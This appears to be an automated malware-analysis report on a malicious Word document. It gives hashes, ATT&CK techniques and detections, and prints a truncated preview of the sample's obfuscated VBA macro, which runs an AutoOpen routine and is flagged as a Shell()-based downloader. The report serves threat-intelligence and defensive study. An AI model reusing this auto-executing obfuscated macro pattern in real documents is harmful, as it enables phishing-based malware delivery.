Office (OLE) malware analysis — malicious · 7c1911444c109ebe

MALICIOUS

Office (OLE)

188.5 KB Created: 2018-09-25 15:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 13644af1415a6093221b2d0c101e6a53 SHA-1: 48a2c86129ed8292624cc700b98b36984f8016c9 SHA-256: 7c1911444c109ebedde7d57174142baab688364a8607dd49ccf44d8dd005cc6b

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating it likely downloads and executes a second-stage payload. ClamAV detection confirms its malicious nature as a downloader.

Heuristics 6

ClamAV: Doc.Downloader.00536d-6697333-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6697333-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 205428 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	205428 bytes
SHA-256: `d058068422154b6582806e9a67fff44870e0d8b68519bc5fe4259b5e58713cf0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UhjoXOF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim smGCMJ(1) smGCMJ(0) = MidB(CbiYj + rHQdCjPCCiPOGDrNLUN + TLwpvFdK, 355, 259) + MidB(iEaCcU + htNuiFfhOMdFaJaWzZTzB + nwRKj, 988, 177) Dim uXscc(2) uXscc(0) = Mid(orPMKHp + kJlRAKmPKmlJzItBN + ZAdqw, 208, 238) + MidB(kUNODTS + MGMSqpjGNCNntTkoKUzZw + QtBGf, 806, 398) + MidB(lpHKo + EzQVzbjTiiPHMjoYmazhMt + iscaAAwv, 507, 616) + Right(pAUmz + RnEZPQWvFSEjKorHiO + Gkmkim, 114) uXscc(1) = MidB(AnwEdTM + iDqIbcUpjvphVwodk + priEpni, 638, 411) + Right(tjGbw + QcwZRSwoifiiTOwZXnjcI + mnHCuz, 616) Dim EnPao(1) EnPao(0) = MidB(zvBrvjqp + YlVjAoOHfoloNzzGwYkm + jGTVDwR, 196, 323) + Left(zkEzBZhF + GVthjstFowaCTfDiWbXED + tHwwCj, 810) + Left(lanUDi + mvYhlGtiXhlpTUzbw + SkjtvTs, 684) + MidB(LMSHqhHo + YIIhqlTzDHTdnwrW + uttaW, 975, 658) Dim lOtjNd(1) lOtjNd(0) = Left(waSYfCbw + XAuozSrwwNnhSWNZS + DIDUi, 795) + MidB(GmPEam + OMOViIlKBMMjOWDtlkiCdEiq + dqabZw, 254, 82) Dim LSYZFI(1) LSYZFI(0) = MidB(JdzBVLjo + tPAjShLbZzkRwMSiPFjZr + wjhBZ, 848, 911) + MidB(BwbAqNdk + ZMzptiOFnNqJcLjWAEoiJLf + sBcvsw, 647, 889) + MidB(nTLmTvbL + oGiiOjokpdOjvNazLuRln + pSVni, 14, 854) + Left(lStjMKw + NZmPZjJNbEXVvrVPqH + iSbHSl, 711) UbMjpPpiNROz (KeyString(zCGpawo + FJHui + 6 + 8 + 11 + 7 + 35 + wHZNw + cSjQLf) + CTjtkU + dftzRw + KeyString(iuiBC + ikidXtfd + 7 + 9 + 12 + 8 + 41 + lHoKpfhR + iCMFjmch) + zRWTfirfpBj + tucpYU + WwjRb + GiIcQUzJ + VmDUloq + LkJHudcjHi + pLRqzo + adaXwNXOS + YikwNWHVo + LoatjKXB + aPZQsVKAG + thoIjbuR + mWovY + RAHivUuzbO + cZhQZ + DZnQwGP) Dim zpLzub(2) zpLzub(0) = Mid(unBTCYlB + zkkdivmjvwAHDnItmj + cHDjoI, 44, 18) + Left(AOuwVHqC + jDuVTLwkHlVXMIVGdhuvER + FRACj, 546) + MidB(ZMhPcKRX + iripAFvdJmHqwtTcE + oVjIwViT, 307, 435) + MidB(mbiPRYzo + ESWdPdwvoHlCrfjRJ + EvRYUd, 38, 77) zpLzub(1) = Right(uPQRlT + CRaOnYRJZspfoNbL + nwrht, 824) + MidB(pGLcQGcp + QACUcsrFjbIQrPU + tKlVTTj, 722, 117) Dim UUoha(2) UUoha(0) = Mid(DHwzkRX + GWtVtvRmmipFjMARQMQab + IdwrmBK, 811, 847) + MidB(BYYDMu + vwbklAGMOpvRnojuzh + ocpics, 247, 10) + MidB(IsjjsLq + zcCoEUJljzolQjvSoNz + JJoiGv, 402, 76) + Left(hmlolNT + UWwXcztkYihwOjjaiTLwLz + BTJFUGBt, 943) UUoha(1) = Left(LkNLEfv + YBJqhscJanXuAsTNbwV + JUpRHG, 314) + MidB(zYzKTXbd + WXNRkUvMhdnCPojLWDJX + csFmvlzZ, 725, 299) + MidB(DFwMHDiR + kVmKZRjNzlVpMQvfOQ + lJzPKwFo, 208, 681) + Left(jzlMj + CzKhzXummmziBAbCqk + amBTF, 249) Dim zYTuq(2) zYTuq(0) = MidB(TjpClD + vDMZrHGNGPhAGlWjbir + kwACrrY, 638, 13) + Left(dYjrvt + naZSKjROXsompvG + WhijSl, 42) zYTuq(1) = Left(fliOl + KdqCIaJKaTomrqzjGstAY + MilKs, 362) + MidB(iRPAIvXX + SNvNjwrPUGQcSOaYwi + wMdYpq, 771, 659) + Left(JFkFww + dQujOpzBjwzbJSBFXBZNll + MSBPbi, 572) + MidB(fRwobso + UsAnzIzSRECIvRWzRVRwEi + DRvJkGA, 322, 66) End Sub Attribute VB_Name = "VtSiQMAjXW" Function zRWTfirfpBj() Dim fKLJb(2) fKLJb(0) = Mid(rGFQDnfY + hBssZWUaEvMCQiXwYidm + YFpvNY, 512, 490) + MidB(NhiGnqAB + fDKbmIbjuEiBRfNNfV + zbjARIh, 648, 537) fKLJb(1) = Left(jUuOJEQz + twjzFWLnjhrcMzDSwMcqGuj + DIOWus, 78) + Left(ALmWunoJ + iOFwZjuVIdFYAvULzkIWD + jcSoCwD, 775) Dim mYwpXs(2) mYwpXs(0) = Left(UmMXZIi + slojhmOlBaCATvLrUj + IXCFzh, 596) + MidB(OcXGUw + lblquZkLEizmvNjJfjNh + MoIOuw, 935, 120) + Mid(FMjNwRF + AkabjcsoZEXtiWhmRFhrhD + hSLNbcE, 118, 671) + Mid(YlBJHj + LiJfNSTXTttXwWdMcu + ovWDAQ, 920, 492) mYwpXs(1) = Mid(rbAXnzX + hmpsqspniTYRVjqnR + tiNfVto, 676, 605) + Left(mHlwDj + bIurHEpBDGkrtGiKG + EziEi, 294) Dim pvzCW(1) pvzCW(0) = Right(lpSjj + TzcfQEwluvcLrDSJNl + FnFAz, 141) + MidB(uNBSfE + TqsTYltcawPUQizWs + EqsVA, 314, 847) Dim MUjYh(2) MUjYh(0) = MidB(ELuioTrK + lKdjFUoFkWEUWnAhTVmbX + mXCrXkF, 558, 699) + Left(oHAshb + zrXunpcmPwiGhQoOMmw + bipSjbn, 216) + Right(TlOcO + HTNldYfSbtjAAlTFzz + bnQAw, 806) + MidB(aLHifdAz + mOzuwUSldJJCImwNL + znTBpBVX, 698, 424) MUjYh(1) = MidB(MhMh ... (truncated)

SHA-256: d058068422154b6582806e9a67fff44870e0d8b68519bc5fe4259b5e58713cf0

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UhjoXOF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim smGCMJ(1)
smGCMJ(0) = MidB(CbiYj + rHQdCjPCCiPOGDrNLUN + TLwpvFdK, 355, 259) + MidB(iEaCcU + htNuiFfhOMdFaJaWzZTzB + nwRKj, 988, 177)
   Dim uXscc(2)
uXscc(0) = Mid(orPMKHp + kJlRAKmPKmlJzItBN + ZAdqw, 208, 238) + MidB(kUNODTS + MGMSqpjGNCNntTkoKUzZw + QtBGf, 806, 398) + MidB(lpHKo + EzQVzbjTiiPHMjoYmazhMt + iscaAAwv, 507, 616) + Right(pAUmz + RnEZPQWvFSEjKorHiO + Gkmkim, 114)
uXscc(1) = MidB(AnwEdTM + iDqIbcUpjvphVwodk + priEpni, 638, 411) + Right(tjGbw + QcwZRSwoifiiTOwZXnjcI + mnHCuz, 616)
   Dim EnPao(1)
EnPao(0) = MidB(zvBrvjqp + YlVjAoOHfoloNzzGwYkm + jGTVDwR, 196, 323) + Left(zkEzBZhF + GVthjstFowaCTfDiWbXED + tHwwCj, 810) + Left(lanUDi + mvYhlGtiXhlpTUzbw + SkjtvTs, 684) + MidB(LMSHqhHo + YIIhqlTzDHTdnwrW + uttaW, 975, 658)
   Dim lOtjNd(1)
lOtjNd(0) = Left(waSYfCbw + XAuozSrwwNnhSWNZS + DIDUi, 795) + MidB(GmPEam + OMOViIlKBMMjOWDtlkiCdEiq + dqabZw, 254, 82)
   Dim LSYZFI(1)
LSYZFI(0) = MidB(JdzBVLjo + tPAjShLbZzkRwMSiPFjZr + wjhBZ, 848, 911) + MidB(BwbAqNdk + ZMzptiOFnNqJcLjWAEoiJLf + sBcvsw, 647, 889) + MidB(nTLmTvbL + oGiiOjokpdOjvNazLuRln + pSVni, 14, 854) + Left(lStjMKw + NZmPZjJNbEXVvrVPqH + iSbHSl, 711)
UbMjpPpiNROz (KeyString(zCGpawo + FJHui + 6 + 8 + 11 + 7 + 35 + wHZNw + cSjQLf) + CTjtkU + dftzRw + KeyString(iuiBC + ikidXtfd + 7 + 9 + 12 + 8 + 41 + lHoKpfhR + iCMFjmch) + zRWTfirfpBj + tucpYU + WwjRb + GiIcQUzJ + VmDUloq + LkJHudcjHi + pLRqzo + adaXwNXOS + YikwNWHVo + LoatjKXB + aPZQsVKAG + thoIjbuR + mWovY + RAHivUuzbO + cZhQZ + DZnQwGP)
   Dim zpLzub(2)
zpLzub(0) = Mid(unBTCYlB + zkkdivmjvwAHDnItmj + cHDjoI, 44, 18) + Left(AOuwVHqC + jDuVTLwkHlVXMIVGdhuvER + FRACj, 546) + MidB(ZMhPcKRX + iripAFvdJmHqwtTcE + oVjIwViT, 307, 435) + MidB(mbiPRYzo + ESWdPdwvoHlCrfjRJ + EvRYUd, 38, 77)
zpLzub(1) = Right(uPQRlT + CRaOnYRJZspfoNbL + nwrht, 824) + MidB(pGLcQGcp + QACUcsrFjbIQrPU + tKlVTTj, 722, 117)
   Dim UUoha(2)
UUoha(0) = Mid(DHwzkRX + GWtVtvRmmipFjMARQMQab + IdwrmBK, 811, 847) + MidB(BYYDMu + vwbklAGMOpvRnojuzh + ocpics, 247, 10) + MidB(IsjjsLq + zcCoEUJljzolQjvSoNz + JJoiGv, 402, 76) + Left(hmlolNT + UWwXcztkYihwOjjaiTLwLz + BTJFUGBt, 943)
UUoha(1) = Left(LkNLEfv + YBJqhscJanXuAsTNbwV + JUpRHG, 314) + MidB(zYzKTXbd + WXNRkUvMhdnCPojLWDJX + csFmvlzZ, 725, 299) + MidB(DFwMHDiR + kVmKZRjNzlVpMQvfOQ + lJzPKwFo, 208, 681) + Left(jzlMj + CzKhzXummmziBAbCqk + amBTF, 249)
   Dim zYTuq(2)
zYTuq(0) = MidB(TjpClD + vDMZrHGNGPhAGlWjbir + kwACrrY, 638, 13) + Left(dYjrvt + naZSKjROXsompvG + WhijSl, 42)
zYTuq(1) = Left(fliOl + KdqCIaJKaTomrqzjGstAY + MilKs, 362) + MidB(iRPAIvXX + SNvNjwrPUGQcSOaYwi + wMdYpq, 771, 659) + Left(JFkFww + dQujOpzBjwzbJSBFXBZNll + MSBPbi, 572) + MidB(fRwobso + UsAnzIzSRECIvRWzRVRwEi + DRvJkGA, 322, 66)
End Sub


Attribute VB_Name = "VtSiQMAjXW"
Function zRWTfirfpBj()
Dim fKLJb(2)
fKLJb(0) = Mid(rGFQDnfY + hBssZWUaEvMCQiXwYidm + YFpvNY, 512, 490) + MidB(NhiGnqAB + fDKbmIbjuEiBRfNNfV + zbjARIh, 648, 537)
fKLJb(1) = Left(jUuOJEQz + twjzFWLnjhrcMzDSwMcqGuj + DIOWus, 78) + Left(ALmWunoJ + iOFwZjuVIdFYAvULzkIWD + jcSoCwD, 775)
   Dim mYwpXs(2)
mYwpXs(0) = Left(UmMXZIi + slojhmOlBaCATvLrUj + IXCFzh, 596) + MidB(OcXGUw + lblquZkLEizmvNjJfjNh + MoIOuw, 935, 120) + Mid(FMjNwRF + AkabjcsoZEXtiWhmRFhrhD + hSLNbcE, 118, 671) + Mid(YlBJHj + LiJfNSTXTttXwWdMcu + ovWDAQ, 920, 492)
mYwpXs(1) = Mid(rbAXnzX + hmpsqspniTYRVjqnR + tiNfVto, 676, 605) + Left(mHlwDj + bIurHEpBDGkrtGiKG + EziEi, 294)
   Dim pvzCW(1)
pvzCW(0) = Right(lpSjj + TzcfQEwluvcLrDSJNl + FnFAz, 141) + MidB(uNBSfE + TqsTYltcawPUQizWs + EqsVA, 314, 847)
   Dim MUjYh(2)
MUjYh(0) = MidB(ELuioTrK + lKdjFUoFkWEUWnAhTVmbX + mXCrXkF, 558, 699) + Left(oHAshb + zrXunpcmPwiGhQoOMmw + bipSjbn, 216) + Right(TlOcO + HTNldYfSbtjAAlTFzz + bnQAw, 806) + MidB(aLHifdAz + mOzuwUSldJJCImwNL + znTBpBVX, 698, 424)
MUjYh(1) = MidB(MhMh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.